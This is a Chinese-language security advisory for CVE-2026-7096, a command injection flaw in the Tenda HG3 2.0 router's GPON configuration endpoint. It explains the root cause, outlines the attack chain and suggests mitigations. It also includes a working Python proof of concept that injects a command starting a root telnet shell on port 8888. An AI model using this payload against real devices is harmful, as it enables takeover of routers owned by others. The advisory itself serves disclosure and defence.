IPBUF安全漏洞报告
English
CVE-2026-7096 CVSS 8.8 严重

CVE-2026-7096 Tenda HG3操作系统命令注入漏洞

披露日期: 2026-04-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7096
漏洞类型
操作系统命令注入
CVSS评分
8.8 严重
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Tenda HG3 2.0

相关标签

RCE命令注入IoTTenda路由器

漏洞概述

Tenda HG3 2.0设备存在严重的操作系统命令注入漏洞。攻击者可利用/boaform/admin/formgponConf接口中的formgponConf函数,通过对fmgpon_loid参数注入恶意操作系统命令,在目标设备上远程执行任意代码。该漏洞无需用户交互即可触发,且利用代码已公开,对设备的机密性、完整性和可用性造成极高威胁。

技术细节

该漏洞的根本原因是Tenda HG3 2.0路由器在Web管理接口处理用户输入时存在安全缺陷。具体位于/boaform/admin/formgponConf文件中的formgponConf函数,该函数接收用户提交的fmgpon_loid参数并将其传递给系统Shell执行。由于程序未对该参数进行严格的边界检查或特殊字符过滤(如未过滤;、|、&等Shell元字符),导致攻击者可以通过构造恶意的HTTP POST请求,将任意操作系统命令拼接到正常参数中。当服务器端解析并执行该请求时,恶意命令将以设备运行权限(通常为Root)执行,从而使攻击者完全控制设备。

攻击链分析

STEP 1
1. 信息收集
攻击者扫描网络,识别出运行Tenda HG3 2.0固件的设备及其Web管理接口。
STEP 2
2. 构造攻击请求
攻击者构造包含恶意Shell命令的HTTP POST请求,目标指向/boaform/admin/formgponConf,并在fmgpon_loid参数中注入payload。
STEP 3
3. 触发漏洞
服务器接收请求并处理fmgpon_loid参数,由于缺乏过滤,恶意参数被拼接到系统命令中执行。
STEP 4
4. 获取控制权
恶意命令执行成功,攻击者获得设备Shell权限,可进一步植入后门、窃取数据或破坏系统。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL url = "http://<target-ip>/boaform/admin/formgponConf" # Data payload with command injection # Using semicolon to separate commands payload = { "fmgpon_loid": "; telnetd -l /bin/sh -p 8888 &" } # Send the exploit request try: response = requests.post(url, data=payload, timeout=5) if response.status_code == 200: print("Payload sent successfully. Check if telnet started.") else: print(f"Failed to send payload, status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

Tenda HG3 2.0 300003070

防御指南

临时缓解措施
建议用户暂时关闭路由器的远程Web管理功能,并将管理后台仅限制在本地网络访问。同时,修改默认管理员密码为强密码,以降低被自动化脚本攻击的风险,等待官方固件更新。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表